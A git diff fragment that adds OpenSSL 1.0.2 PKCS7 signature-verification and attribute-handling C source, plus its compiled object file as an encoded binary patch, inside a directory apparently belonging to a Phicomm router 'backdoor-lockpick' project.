+        PKCS7err(PKCS7_F_PKCS7_DATAVERIFY,
+                 PKCS7_R_UNABLE_TO_FIND_CERTIFICATE);
+        goto err;
+    }
+
+    /* Lets verify */
+    if (!X509_STORE_CTX_init(ctx, cert_store, x509, cert)) {
+        PKCS7err(PKCS7_F_PKCS7_DATAVERIFY, ERR_R_X509_LIB);
+        goto err;
+    }
+    X509_STORE_CTX_set_purpose(ctx, X509_PURPOSE_SMIME_SIGN);
+    i = X509_verify_cert(ctx);
+    if (i <= 0) {
+        PKCS7err(PKCS7_F_PKCS7_DATAVERIFY, ERR_R_X509_LIB);
+        X509_STORE_CTX_cleanup(ctx);
+        goto err;
+    }
+    X509_STORE_CTX_cleanup(ctx);
+
+    return PKCS7_signatureVerify(bio, p7, si, x509);
+ err:
+    return ret;
+}
+
+int PKCS7_signatureVerify(BIO *bio, PKCS7 *p7, PKCS7_SIGNER_INFO *si,
+                          X509 *x509)
+{
+    ASN1_OCTET_STRING *os;
+    EVP_MD_CTX mdc_tmp, *mdc;
+    int ret = 0, i;
+    int md_type;
+    STACK_OF(X509_ATTRIBUTE) *sk;
+    BIO *btmp;
+    EVP_PKEY *pkey;
+
+    EVP_MD_CTX_init(&mdc_tmp);
+
+    if (!PKCS7_type_is_signed(p7) && !PKCS7_type_is_signedAndEnveloped(p7)) {
+        PKCS7err(PKCS7_F_PKCS7_SIGNATUREVERIFY, PKCS7_R_WRONG_PKCS7_TYPE);
+        goto err;
+    }
+
+    md_type = OBJ_obj2nid(si->digest_alg->algorithm);
+
+    btmp = bio;
+    for (;;) {
+        if ((btmp == NULL) ||
+            ((btmp = BIO_find_type(btmp, BIO_TYPE_MD)) == NULL)) {
+            PKCS7err(PKCS7_F_PKCS7_SIGNATUREVERIFY,
+                     PKCS7_R_UNABLE_TO_FIND_MESSAGE_DIGEST);
+            goto err;
+        }
+        BIO_get_md_ctx(btmp, &mdc);
+        if (mdc == NULL) {
+            PKCS7err(PKCS7_F_PKCS7_SIGNATUREVERIFY, ERR_R_INTERNAL_ERROR);
+            goto err;
+        }
+        if (EVP_MD_CTX_type(mdc) == md_type)
+            break;
+        /*
+         * Workaround for some broken clients that put the signature OID
+         * instead of the digest OID in digest_alg->algorithm
+         */
+        if (EVP_MD_pkey_type(EVP_MD_CTX_md(mdc)) == md_type)
+            break;
+        btmp = BIO_next(btmp);
+    }
+
+    /*
+     * mdc is the digest ctx that we want, unless there are attributes, in
+     * which case the digest is the signed attributes
+     */
+    if (!EVP_MD_CTX_copy_ex(&mdc_tmp, mdc))
+        goto err;
+
+    sk = si->auth_attr;
+    if ((sk != NULL) && (sk_X509_ATTRIBUTE_num(sk) != 0)) {
+        unsigned char md_dat[EVP_MAX_MD_SIZE], *abuf = NULL;
+        unsigned int md_len;
+        int alen;
+        ASN1_OCTET_STRING *message_digest;
+
+        if (!EVP_DigestFinal_ex(&mdc_tmp, md_dat, &md_len))
+            goto err;
+        message_digest = PKCS7_digest_from_attributes(sk);
+        if (!message_digest) {
+            PKCS7err(PKCS7_F_PKCS7_SIGNATUREVERIFY,
+                     PKCS7_R_UNABLE_TO_FIND_MESSAGE_DIGEST);
+            goto err;
+        }
+        if ((message_digest->length != (int)md_len) ||
+            (memcmp(message_digest->data, md_dat, md_len))) {
+#if 0
+            {
+                int ii;
+                for (ii = 0; ii < message_digest->length; ii++)
+                    printf("%02X", message_digest->data[ii]);
+                printf(" sent\n");
+                for (ii = 0; ii < md_len; ii++)
+                    printf("%02X", md_dat[ii]);
+                printf(" calc\n");
+            }
+#endif
+            PKCS7err(PKCS7_F_PKCS7_SIGNATUREVERIFY, PKCS7_R_DIGEST_FAILURE);
+            ret = -1;
+            goto err;
+        }
+
+        if (!EVP_VerifyInit_ex(&mdc_tmp, EVP_get_digestbynid(md_type), NULL))
+            goto err;
+
+        alen = ASN1_item_i2d((ASN1_VALUE *)sk, &abuf,
+                             ASN1_ITEM_rptr(PKCS7_ATTR_VERIFY));
+        if (alen <= 0) {
+            PKCS7err(PKCS7_F_PKCS7_SIGNATUREVERIFY, ERR_R_ASN1_LIB);
+            ret = -1;
+            goto err;
+        }
+        if (!EVP_VerifyUpdate(&mdc_tmp, abuf, alen))
+            goto err;
+
+        OPENSSL_free(abuf);
+    }
+
+    os = si->enc_digest;
+    pkey = X509_get_pubkey(x509);
+    if (!pkey) {
+        ret = -1;
+        goto err;
+    }
+
+    i = EVP_VerifyFinal(&mdc_tmp, os->data, os->length, pkey);
+    EVP_PKEY_free(pkey);
+    if (i <= 0) {
+        PKCS7err(PKCS7_F_PKCS7_SIGNATUREVERIFY, PKCS7_R_SIGNATURE_FAILURE);
+        ret = -1;
+        goto err;
+    } else
+        ret = 1;
+ err:
+    EVP_MD_CTX_cleanup(&mdc_tmp);
+    return (ret);
+}
+
+PKCS7_ISSUER_AND_SERIAL *PKCS7_get_issuer_and_serial(PKCS7 *p7, int idx)
+{
+    STACK_OF(PKCS7_RECIP_INFO) *rsk;
+    PKCS7_RECIP_INFO *ri;
+    int i;
+
+    i = OBJ_obj2nid(p7->type);
+    if (i != NID_pkcs7_signedAndEnveloped)
+        return NULL;
+    if (p7->d.signed_and_enveloped == NULL)
+        return NULL;
+    rsk = p7->d.signed_and_enveloped->recipientinfo;
+    if (rsk == NULL)
+        return NULL;
+    ri = sk_PKCS7_RECIP_INFO_value(rsk, 0);
+    if (sk_PKCS7_RECIP_INFO_num(rsk) <= idx)
+        return (NULL);
+    ri = sk_PKCS7_RECIP_INFO_value(rsk, idx);
+    return (ri->issuer_and_serial);
+}
+
+ASN1_TYPE *PKCS7_get_signed_attribute(PKCS7_SIGNER_INFO *si, int nid)
+{
+    return (get_attribute(si->auth_attr, nid));
+}
+
+ASN1_TYPE *PKCS7_get_attribute(PKCS7_SIGNER_INFO *si, int nid)
+{
+    return (get_attribute(si->unauth_attr, nid));
+}
+
+static ASN1_TYPE *get_attribute(STACK_OF(X509_ATTRIBUTE) *sk, int nid)
+{
+    int i;
+    X509_ATTRIBUTE *xa;
+    ASN1_OBJECT *o;
+
+    o = OBJ_nid2obj(nid);
+    if (!o || !sk)
+        return (NULL);
+    for (i = 0; i < sk_X509_ATTRIBUTE_num(sk); i++) {
+        xa = sk_X509_ATTRIBUTE_value(sk, i);
+        if (OBJ_cmp(xa->object, o) == 0) {
+            if (!xa->single && sk_ASN1_TYPE_num(xa->value.set))
+                return (sk_ASN1_TYPE_value(xa->value.set, 0));
+            else
+                return (NULL);
+        }
+    }
+    return (NULL);
+}
+
+ASN1_OCTET_STRING *PKCS7_digest_from_attributes(STACK_OF(X509_ATTRIBUTE) *sk)
+{
+    ASN1_TYPE *astype;
+    if (!(astype = get_attribute(sk, NID_pkcs9_messageDigest)))
+        return NULL;
+    return astype->value.octet_string;
+}
+
+int PKCS7_set_signed_attributes(PKCS7_SIGNER_INFO *p7si,
+                                STACK_OF(X509_ATTRIBUTE) *sk)
+{
+    int i;
+
+    if (p7si->auth_attr != NULL)
+        sk_X509_ATTRIBUTE_pop_free(p7si->auth_attr, X509_ATTRIBUTE_free);
+    p7si->auth_attr = sk_X509_ATTRIBUTE_dup(sk);
+    if (p7si->auth_attr == NULL)
+        return 0;
+    for (i = 0; i < sk_X509_ATTRIBUTE_num(sk); i++) {
+        if ((sk_X509_ATTRIBUTE_set(p7si->auth_attr, i,
+                                   X509_ATTRIBUTE_dup(sk_X509_ATTRIBUTE_value
+                                                      (sk, i))))
+            == NULL)
+            return (0);
+    }
+    return (1);
+}
+
+int PKCS7_set_attributes(PKCS7_SIGNER_INFO *p7si,
+                         STACK_OF(X509_ATTRIBUTE) *sk)
+{
+    int i;
+
+    if (p7si->unauth_attr != NULL)
+        sk_X509_ATTRIBUTE_pop_free(p7si->unauth_attr, X509_ATTRIBUTE_free);
+    p7si->unauth_attr = sk_X509_ATTRIBUTE_dup(sk);
+    if (p7si->unauth_attr == NULL)
+        return 0;
+    for (i = 0; i < sk_X509_ATTRIBUTE_num(sk); i++) {
+        if ((sk_X509_ATTRIBUTE_set(p7si->unauth_attr, i,
+                                   X509_ATTRIBUTE_dup(sk_X509_ATTRIBUTE_value
+                                                      (sk, i))))
+            == NULL)
+            return (0);
+    }
+    return (1);
+}
+
+int PKCS7_add_signed_attribute(PKCS7_SIGNER_INFO *p7si, int nid, int atrtype,
+                               void *value)
+{
+    return (add_attribute(&(p7si->auth_attr), nid, atrtype, value));
+}
+
+int PKCS7_add_attribute(PKCS7_SIGNER_INFO *p7si, int nid, int atrtype,
+                        void *value)
+{
+    return (add_attribute(&(p7si->unauth_attr), nid, atrtype, value));
+}
+
+static int add_attribute(STACK_OF(X509_ATTRIBUTE) **sk, int nid, int atrtype,
+                         void *value)
+{
+    X509_ATTRIBUTE *attr = NULL;
+
+    if (*sk == NULL) {
+        *sk = sk_X509_ATTRIBUTE_new_null();
+        if (*sk == NULL)
+            return 0;
+ new_attrib:
+        if (!(attr = X509_ATTRIBUTE_create(nid, atrtype, value)))
+            return 0;
+        if (!sk_X509_ATTRIBUTE_push(*sk, attr)) {
+            X509_ATTRIBUTE_free(attr);
+            return 0;
+        }
+    } else {
+        int i;
+
+        for (i = 0; i < sk_X509_ATTRIBUTE_num(*sk); i++) {
+            attr = sk_X509_ATTRIBUTE_value(*sk, i);
+            if (OBJ_obj2nid(attr->object) == nid) {
+                X509_ATTRIBUTE_free(attr);
+                attr = X509_ATTRIBUTE_create(nid, atrtype, value);
+                if (attr == NULL)
+                    return 0;
+                if (!sk_X509_ATTRIBUTE_set(*sk, i, attr)) {
+                    X509_ATTRIBUTE_free(attr);
+                    return 0;
+                }
+                goto end;
+            }
+        }
+        goto new_attrib;
+    }
+ end:
+    return (1);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs7/pk7_doit.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs7/pk7_doit.o
new file mode 100644
index 0000000000000000000000000000000000000000..8d6ab532bd2007e8348e6c242b664144e1ab76fd
GIT binary patch
literal 22008
zcmbuH33Qv)mB-~J#E>AF-7Qc|5yWi93Q%kaVA*o=8I)iWCnRjbv6a}w8}_F(VMz$K
zDPKjxQrcl!=9JR*z!~Vw>1in>ZH-9+ftIqil#*d71B_J>mI5Iy44(gei}bhRkJFj?
z&XM)$_wKvzzWeUG@4Zh-);GoH78ex->{S#vCy@VSX&|uY!u)-`x~&hC2SS19Ma|wP
zk=@ZH&EAXA#nGYPO+;H4FLJz39q$=u=$(oVCtZ4M6)HGhEL;{D8<)Dy$XICjcr@d9
zJDR=iij9n|t8I#m4Lv<E-}_*5DWtXpiUWbT_g|)XeHg`&C%4>*qR|ojdE{vPQH9cM
zWLM_b_}rYHThZ*j71@o7aqllq+9`{-YbmtwVtP(^%T9<n8&Ahy%^mMC7?e6ntB(Tb
z)r)4;M7CWti$?EVsGh8M{a19|eJ0gyitN%=tDN*%&d7vY-rRnMBKU0HOT&(LV)WPI
z@u)Z5cD89`S89J}WS3j!c<&iWc(21bRr}JNrs2@`ikLTk$z{<?qnAZ5k0!QZ1X>q6
z-hX?aEQ+>hnUOI!(d<3e6nRq=wpxX;y4Tmui+OL`&vEZvCtd4!+f*&M<Jh5V$^xmd
zlfI_hAono&5ZS#<H<*FVf#}5c>;o4^#x&X%y+{J#X_(>tA=(=CK3W{vrGf#G;0&D`
zNcCx>yb=`xKZ1t1_t%*BZp;j`9*fZMH&G&9^B%X2Pk&gPlwA#j5lJ%@PU9wv2s_Jr
zSL;pJHhVkNE&At{PdsKlT{ph|rR*JXPY)(q)6FVTL?EnjzpUEZYE{7n8|`>R#vHhs
z{H*$vUSFZ=5A8W5wU3i-tjrz{2WhskC5u@8`?S@EN`a`~f2g)p#Olkk#qig*Xlpav
zBZ{=?#%_s36HS%q@91^-lMnRF27GKr5W`QZnyr<4e^eCghj84|1JUf+a98B{(LUVk
zW>h4m_CwTZf1ZwbRwd2em?HC0zY^1|5>-^g$^>Jh4n{rP=)q#|4|=M9GFpbYYV?RV
zQ-|vr(G4x5>#Zs!kX?pZ?|6TLS!+<BHEXj>$77Q!A#!!SqqV5%YTdY7ZpQ}-GgnVc
zOvJs{WstUg82ZZJbtryrX2i#foDJ{X2fYqPjdId(Skei`cSkH-gF9_bbjRFs`7kto
z$k3kB&^I2(y|eKUK~8(=4NlRs=S;kgd{7zL>7>_G#nV@mjc5LQVnVc(DJicsoY{^$
z5ps5vh6Of7CY<!r8j(gAR5{+I;j(zTvjVVe{>ZM-$UiF~$#E|3vX`mKD1>ym5|kQ7
z+I=yv_RVZU8v|D%>A)n2uPGZ}QfN~4Og$?7P(Rv*KNML9m7;UT(#TFp7q&A{DW-3P
zhkz<jO(pZ3_s;@cH!JOiksfujcGA~|%Vq8!1`8zD|Dq%in1ERJxAR9PQv0E|slzj+
zfX>Ei!!>d5^YLAuiDc@nOd533K<nu_X;KuJeu+{P57#23WP%_Zl!mxTo_I&fIKr~1
zDbCHAlBSV~^~Z?OvI0e(j65IREXf8rQPmk4TYq?FHv(L&bz-nqd;t1X=5<-3Hg<=X
zs@nMqp-qpAyr_&kkL6M8gA1Lwmoe2to9=;(w0)S<4*S@-m6<<DM<fSJ+8xBOLzStx
z_SsA)YN}6;*H|X=ZD(e&GUeKEeH>}AQWn7XoQ?7D(zy3`$BT!na;<&|eS^08E%!<j
zybz`#24$g<Pf?;nC5pSzVf;~{B8zwxf<ftuD{*K-Bv}19mrL3Fktf}<xc7{bMn6Nt
zKSk3L2hy7|g(Y}Go1Q}h5<q#5Ag;8lk+fPab`4*J`jOpse6g%4dI_jySmfuxa%>}-
zy+3V6U|<`8Vrv(a-15iICnj{~)K((bIc;WSB72VVpz_<};>Eo>4K15WkZ&a2r(5B1
zEP0Qh6+I+PktZ{6p$(_q4Id#Pvs7u8zSUqGkis(G5w6L?GjHnx%!ccl)9dVNa%k#U
ziNR5fC+z;j$c(umeP_Zp+u#h%2?tVoTy6LD`sp?+1vfx}Eyy13q)Wr;nvvb>o`!F=
z^NsYct!XaS1s(F)Qyi}wMq;qv%$4e0$NZ5uWmL^fN6@Og>7?&csT6yZBlLa`QCMR)
zDjT-n2U}<X-8)17ZV|SNosym%&xNDB)^IH)>R5PbWDJePpa*#h6UpAR$c=JME^Y5Q
zEHqq<@fg}u5gPshiih?b8X7qpM5oj>RpV#wnV1lt%ivb3+K_Q0&d{~t%0TK|9UtFA
z)lo^7D)=Q0BERb3M^eoEI}}biQk$h2WNekzhp$kX)vgS=S&o}>s1B%^uI+NLICM(7
z$Knu|RPU6_hCyx2;$h4OOcrHpE_LZdCk1MPj7TtR+hxhmUL<<elHiD1<YcW@e@NHK
zXL5nB+9S}@?7dpC_=B9X)9iA!Z^SJpqrbAA4ZjUZ^s)+XfymD6Ns;Fr?@_fEu^TaG
zWTzWM`ggq7n!VRl*N`5n;@+or!XiIZg*I)32IL16yr+chp}|Hsc72ir5v{U%RzjLA
zlwmWqUWx3?Y(i3yEtEn9J=SYYXk;NKx7H=QDAuKFWgnC{DGxMzuY`s-<WsR84YOdu
z?^7A06l7jTC0SH4^`nuUaU_XY=592l5};jS9B-?WZo(99MOsexBRe)oEGP{Q@=g`D
zm4`(qcBo2<#_IO0|5fH@C|9zkA}T>kZqn<T-nP{CY`v=Ly=qj(G4EhXiyD!w<CT9^
ztM^SO+a6AA%Qsc`()z90qaEaV)N#WxRdIaR2f9kwR>7EK5pvYJjHHp9xu!)oT#j@J
zPl;kjCX*_V1p69d&Os7Ui-Lpx>zsw6o3^VWR8YcOq%pIOc{|Jr#vUa8#fs*S5}{2u
z3B(At1X44wr;16gYmtqURf$-O)xGb|&J#peSQ2_nkU3iA?np<@lP%mYYyoopnqe$z
zkt5-eN~fumQ;bQYvYMRO4#E!JY5!1*nDEE!au2}rVW&fOI;L02eD5t@MUc$V#o9os
zB75YNS?cvTI#8QESDaj_R)%0MNHC$YllR-aqS!+gHgoRb2o~5e-+M=yn7IW}jL6R1
zjt!m4m{~Is1}DuVB^*KWkXay(6mJ|nr8mC730Q}8LJ&*vLFZ;!p=Kc1?7Wu_E}i1=
z+-c4W=J2f6B=hiM=$)2Hi;p7_I<GvpC$`gY@B9%NL-V2Gr83Ic7$UoB3*+g=+Q^fR
z4B8u(Nthq1!eNd)+%TJ#X>in*GW=0K!Zy<!i_~r<4NklEm+(<`Au<Ka%n?OZa}dJV
z814=YKPV#Y&vKjhs9M;9#W!|@_3>Wzi(*%<ho<p$YcV+GW_E4q%WuxHo?%KM>$(?B
z>d`t()j46^m8d#VZZ7OlXw!+Zc`}ZH`Bg|sSm|J~YE_?1za(LSE=<@>gprq#Kt{oM
z&Qu!>TRgPAC4cx+&mQm~<U-j{D5cm7xTTS?Y%P+ZI*@<pq&u-6+vWa6c9eRM?7KW2
zd4Zme$SQoXJz0v%%<b<^OyoB)yXBbK?0tsw{DyZPhIc7=hQs#(M8+h^*V+(mM&Gnu
zQM(VYhs}8^a`rlGc84o7cc7?QW-AVXcww86?!>x}qvKMfz(=s|>X^~VFBQ@&P!u?G
zf4-{hE;`FI$D)c+hK+$$6oFi!BKM)ZoYdSuuWJoVSXw#$4!nUztr*}M>-9rIBfo@v
z6uIc&KxkO@OxDYJ@g4P*Ffx$2jWm~!e`m5*7@60anyoduClqSKB-ProrvI{G$=r`W
zw!Jbtdu7eSo?^GRb^Mg~&;!iJ;oBf6C%R4vzba>AtDH~mInZ6LbRb*>=IqIjrfec-
z?rthC4~>YTYz1Xrvt!1Lc{Tg>(ISkN-Q7<<;;ur)(d+RiKhLq2WY3d@v<Bw_In>yV
z&!~AuYL7}Nz5&HZevv0t*vqV{@m{u0vIpCV7<PX8AzBQxX{M9bVVcX5q2V86EVK$7
zTdNSIGocs_tF7kF(C~CMhxMinyR@01O&{aXgXU&pH>WEOt*ONx>9Npo3v{XdXKweR
zPL1ODU+glDuTTdnwaL?ITt-7qS<UI|bTCP}{61_LJxz7dOj)eVUsb1F)h0e2oDcia
zn;@C_xg5rjAUn-yB2;nK)F#5-3e=gU>!=5~Qb)NST_qP~9+&Q^k=HF_Air(bpQ!gJ
zv~*|gfeh@e)ynnRddtxmF>Fk59@1E)&Cu{HB|E=1Z<XEN%b<x>CV<7N%wO;*1)3#Q
zYBks>&&*sSUE8o-Qclc!qTqmqL{*c?WOSmsaP(9NjlYbKlC(=zN~0%bcxc<~eQdLs
z_W}}`EI5-AnRo{2mzTBN;7H^jNuMfQWBmXsWoD`XXe^f`n45l4?=iJjz6A+HY~eG+
z(C||zK%~dLzag&I;Dh#`Sr@E(V$y)jZ{uCP3y<Le;ViX;?1k~XLeE9aJN4X9FP3Hv
zh<e*4@|MBkc)GnpS@>6Ix0R&u4f%|&I5Kvnm|U`Ks?(f2%R(WZ4uysvqFV5|eT1c+
ziC%@W{QS<`jE@-E(z^1Lq&aM5tQzaaBqTCF#h+Mit<oKpQx%?3<Q|k`CyrgU*$d>2
zUO!WZ`2J9l?Uo*wPudl@$N`v?%J}RwY@M<fBRx6kORAznPw5G%pSQRT@;oYyed(iU
zIQlF2NqZi1!G3+PbN!LJHF;7un(J#$lTAmGc5Z@5F74RGe8YALzL<WV%lk8Y-So%k
zlKI}_dd2++-*({1f%mC=*W{$v+EwRJ7kgQgHn8%i>eQ-_^E3{`h`$!R@QC3VbspC7
zfh;Hw($L3Lg|_`lSRfBT<P;}CoIOGgWZtWJpW3I~Gf+AzX*)ln*>;GH=2ql<o%P3P
zjZ@UILfKjNPQG@)14DdSaf$lgX(IPkPo@F;Ybmzhy{PYh^cGe&B94bg-tsU7`zMSn
zf7|t5WT)zKGcpp&$5JO@TU6)0ni~|esa30*;H}z2$Qm!=1Zct!=f9`aMvXRI)G&5d
zU)V6pzp&w&|3$;j(2k1ChPQN{!-txTix2&)&Pa6hb-C5;7?^+jn%CHPW@Xjl<*8mb
zRasYkYIV)Ykuy^2V`Sazn(CU<j@MYLlo6JRFMHg13l__AJSI#QX}J#8Z-Jt#7Y2&f
zlouU7b9&jWk_^F*FlC!$3N-}FZz-M^tk_i26s+7>IyYE#^R#HN=Ei-Z!P=qe=LK6z
zt|$uD#)37`U{yn~vLRT38V$iRR25yFM%VT7j*^YVkhr-d8mzogbPY{w2-XxY+b>uJ
z618=kW}v8%0Hz$O|6Fw78kaxHF6c6LHHlrY;>LX%#jbh5mf}Z)wJ@~6tO`{9OzPum
zlt0m6`A~6jR1B`d#|r5)uC4M1ZQNWO3s&4H_70U6KNPHhxayq9#*FNDbF%2cjU_M~
zvbW}C9hCPQ*?VL_=88}Awm0N_8q>DFUQ}}Jw5hDuK2@m=YVME)_=|PLf_E2{^zJkD
z0M($nd_N}F4zUlqZiXvtf9D1JOMX_QhQW3_5Qf+sQ|B_NsOl&m#e$W^=i6RO>~$D9
zN$qlpAJ!OlmjvTfwyQBzu{AIFeo@I_>D0E1{_O?&C8l38?8~?hGzH6BF|g9^`-VRt
z?*;AVW5>kwvqdG>6;IvnrKmo~Orm3q&u%Gh%Eh4?OVtN6mMz6E?iZ|`7p$2#d44p_
zfI#D3@hNe2m(jl#_mlmLxLRpFtmE~Ge^6HZ^^uXa;~}g}#sQaQ`qSQjrK_cZ4<`05
zk(^?JyP&Wnmu)5&lt9x|SBc72lS^cCUrhQ{P6E3Z^GLY;e7&jmwdtA%&3KO+UWs>+
zm#@p@YSeFmGw?3F&iH1l;foCa)NnP&O<74mCf?pxNnqc-AxKGJKOZiO?c__gQ#xx;
z=JKf|P_`G8&47$!;dMR0R9sGfQ*rsuZ7ROmhwt#=FZuAdefVx4E?<*OWzWGr{8%3@
z&kd&1Q|rT{KD^n7FZSW9eE6Ub|Ar6$mJk1~5C5SLm**@~`QaBn{I@>*_dfg;AO5xv
z|Hy|IV}4F$r_AT6_+j7&V*Y;Hq!hKjBBqY>kw4XkH~a9*eR!`Azut%6?!*7phi~)Y
z&-w5-e7LN8Q~6C&^Hls$A3n>6&-USG`|x=_{30LT0WRZvhDo7n&x7$z`N)6Mhu`VL
z@AKgg`|#&{c-DvSi?|f~e`}nr_F1sM5_~HE*ZA;8AHKwgclhv>5BGey?9;^l+Yf}%
zxYV8x?++XPp5b=?@Pgr=8LswukpE8~{d;`)zF6O<^3M@I{3IWKrVpR*!@GU>h!6jk
z5B~wU`0dWa#B2He)q{rr*l@K^MfvlFKVrDrr-G0B=>MA!m#xWEeml^I&+_4CfQ$XB
zjDc#e3ws<N`ISEW8Xx{0AAYY79|aeCHXRNlaH+j9-e2~Sf7^%e^5FsO8%6(gbNIFT
z4>A0D!)=_`7{0N92k3a;zp8x@XZ>XRz}kK{G0@e!qA$>Le&eDu5-XE#qOaY>-$56A
zrNPU)`Vws&9f^*vmB~T3x@&Ntt-8jPt?25t1%c{#V@)72FMdHoG@iI%?%YL9t%=rX
zL%b;wXj;;eXgR-WS)#FZX`(mz^*pe4boF+*c`9P<?m%~-Y2m^|f67fH2L}2E^5v#h
zpmE`{mevarJ#F3HeeHn@TACItS`<&TcPHC=2a~pR#XvHduPUk)NuZZ)?W+>)ovRWn
z+Pb;}7c`ug=<Vv5-M9S8z~HJxZ>mS$R=0JhlB%q|r(f~p*HPBp9awsLO<f||+Pbj0
zVR36yqJ1FQ<|aj=KQ-7{SgM+o7NC7LS`oRyq#I~xz96w8(bJ)B#52~4!CqyvjEQ#q
z^0mEfJxL{}Tq8AAOG<_GQQgRZxNG}$kLSmf$Dv+E0H0Ke$n_@IxMmDH+T6Bgalfjc
zXz%LpOln^@Hn%uU3lpo7YZKkc-j!~rQe$Y>>M3BZ<wm7N)FzT^0t=%HVu}92WU8Yt
zv3#wY9Arf@A_HwO8|^UfZyRXqNw^5U!QMz9x@bWp(YmaqX>$A|dsQ5(dMd({qt(!e
z>-tm6tyWcP#1ksql*&aIzXkJTENo2YygR7JS==(1=t=h2F_Qbl^3)3LFnB(J_#<b=
zlI?vRdH}=*?NBp(%CZH~`G^;U6I&pkCEO)?2Poi;yTu9O4CNJelell{5t0)0i%a!H
zU(`Hr0mij?!CdsLYo(4f6Dzri7*o@I5sFoC=$aDl38|hyyeR9tTsWg^wvI4eXK_D5
zO7}mnWNue)8|JePL$OTF(p10kn>ea#a4?k|NJuCQCI`A8p3h5SX0jvE<{~pKPeHpb
zlGxRn*_9H7DohyW(tx%})som`89O7zYb(0jR_Zu4o@wvvUn>=K%gBf|#vJ8C<jaKH
zg$bG~j@aT3<;i@A4t8Cwy(7-m*5^CAR}WQXq^!Q4eD4QME8>+lH#Lx40)MU0vj^7p
zOFXElh)7j&1-I*N+Zm}FRKvNXX<_r+Wip^LI$9H3B|bL#RrIcq6tjHo6vL&87qwon
zut}vI6-ot6Jlmfd=<h>*Rz<6o<%#y>fU7~i{^SUenuSp?sM2j;zs~4LsT~L?r8b|J
z1?k?3hMaq?3uR?1RGS~eyu4c9BkHd_a|#3w!VBLjsH=&%Jnyr-gSh-g!SW5n4<&vt
zaoKWN`7MUy*rfJRmOn!B>KU@J=S||Q-##c4`&s`{IQPmWoaN;?g<QhFgqLl%j<{^a
zEWePrY>6yyC(iO~h|8A6%HKu&Na8;y{uSc#6F0fU&ZF?MdY&g<N&GG1tS2H4#wB`=
z#>?tCpZHgaFDHHs@wLRm#699{=N-h4CHWr`XFGpNob^9K{Hvtr_r#AQ{%7K>XM#A}
za}dsxa*2PK$B55Dne|(oxI9C){7T{+Z`TlK{WlOlp7hAMS}w8Y1iY;N`-z`O{4wGu
z5g#Yc_PkI0WRl-s8pI`U)p*%<tBJFo2I6eb3gRr^L;MudFXv>r<gErT+wKP9lA|nt
zjyU`C9m8dq<yp3s-#!f=a7i)SGeMl=@Bo}!<Pv#~=Ox7DhZI)-<-|E2))VJ;?<CHC
zyPNoFr2hfp@+Gcq_aWk6BQEDRxx{|XGp`dr17%jvZsN7X55T!gF40qmmz6)AIP2*p
zekRFZOZ+V2_Y<E(e4F7ij&i=X?LI;Bye@n~oc%n*Ji-_I&n7(w5$Ak<EOE}~bBJ@C
zv=Zkyxq|pP)b1MMyw2WC{9Ka1pE$3xPZ8(-zC)b-88Tm$h#%@n|8c~59Xyvf=ac!w
zdET`XkCOf#;tj-8#H)x85pN`(CeHFdBF^(@Gw~Sdd4V|h>s{haB>$-oKiWJW6@T*j
zeiL!_&*MJ)BjP-c`_F)4T%w=-IY6BCuO)sw>e%_Rf%rV)PZDQ6&k|=nFA--w(<I5_
z5<A)cGl`#wGHcI#;_UxRiSzs#AkOpaYT~m<{|&@BPVOVlcK(t$`(Z0__QP+8pFr(?
zK%DhYHxIDHKfGRqh_juuiL;)i#Muunafj^rCUN%XzY%XH`5nYre}?#ZB>ypS)_+70
zLb#;AEMG^Q<6$9jUPpR}pATI&e%2F@6HgmnxL({r^1NRBggCEj&l6|;ZxWwR?S4X>
z^Jh^ALb${ayp9||oc(hGarVPp;;g@gIP32s&hl3gXZa1pPlB!1&)*`>^Wta3IWN6H
zJVtt6A<p^yE#e&ie<RLuGSfU{7k{#yb;NnTv=V1OTuz+*&`X@<R}*LXA>vKc-&=k7
z-9G$5;=GQ0N}T;)d;l85C4S(%v>$QKOUDww0Cnv6))8+Zei?DzZ(L2B{d|kzGVd-V
zJ$I1&LgGImzKHmC;_T;_iMNt`#_+=V{vpZpe4k;y9}~Z^o@(OU-*bpBrgmG1*Arhs
zobB%=&U!|O^SJ+*IFI{ph;x2^o;c^>H;A+Rsj}(BC4S&|IGZ@PyUcL$^Gv)<SO#t*
z`DNfXu3q-xhs(nwT+%M<uO)sl%B-HNh_n2S#94kbah4w^ehKL>lEKC$_FRgWZFdH7
z)^jp(&U;bf)ud-Rah@;N5a;}sCNAIkT6^vy&hqyYuP6CY;){vDMx5iVSd7CZe&G12
zAkOhKn>hRDBI1`rm$ko>IP1TT_(ddtGw}rRUlQkW{4;U6we5aF{0ibFhv5S*>F)x(
ztb7IWHsVJaUYKW2A$iU-7ZP7idR7y!C;l06o{!T+DXzl#a*z+N_2Cy1=lJX+&T+Mo
z_$g@L`sdrkYl#1dILkjkd<DsGCLSUFG;xlfcZqZS94w18F7Xe?Lzs96%B=kj#5qnb
zA-<C2R}<%Tb{%nEXVb(xNzeBTm-y)-{zH;qNPHXdMZ}*Y&g;uK@pDLix(MMC|6GZe
z^}_+g`FY4};_RO@iE}<#NSyP@ZNxc0eBXy}C*DnVenPy5_`&k92AA}U?L3BfFUo9x
zPbA()+#$|-T8Q_P{KY=}KEovz!X*C_k{=-c5b;6c&k*N)`$ys~$-hnfIN~1@=lOE9
z3=*zFJC8G5{K<CK5NA6b;%sLNakeu-obBu-&USuUq|8*~%lb8y-wx~7@22JD<j(TX
zr6ah?^jnU17<t*l$YteEG~DiMEdM9N&GsQDztZe)Oj^qE&kQ%+%JIhyuT-t(+r7?k
zi5a<UyUR_3m5S!M`52HnBA1o7zsG)9;~clY$Hq@=)Me%E@3G~7@{r4N`+IDsfZN|=
zy9M0-{&TE=+use&6vd?9{vNNsfZN}>$$w<T^7eOb*A{U5JGUnaxc%MNe-v>0yRVN5
zxc%K%z4;zQisfa0e|2{Ox4(mWs({<yFYPJd_V-IOO*~rt_V-JH>cO==ZrgIay94^Y
z)7}jvyW6T=`58;Kd_x_mUOqS&s2=E(4<a6^j^LvRX%?t%@9XJF_Cmh5&rMe2-yfZ<
zegR}Yuk1}#_Yd^-<BRCEred-aUo6XyZvMYlB@{>qn6D3V>gvtickP5QpG~;r<Ro2*
zi|TX4+?=N0?>6gzJZ_S@c3#{0Cpks9aX;?#^>RVGmKU~v5(-4;|FypCVMOO_y!f*1
z&tQmq+rE8oGECxwuW@646+_&caLUno!{nW>yJd5W>wW#E{=JEeQKA3jS(ex$dpf?#
z<x3-6vNz<*+HK#LpwQm4+*zhRGr2F6T>&;7ufqP<oBEX~<ICD_**e^a&cgavnEDk3
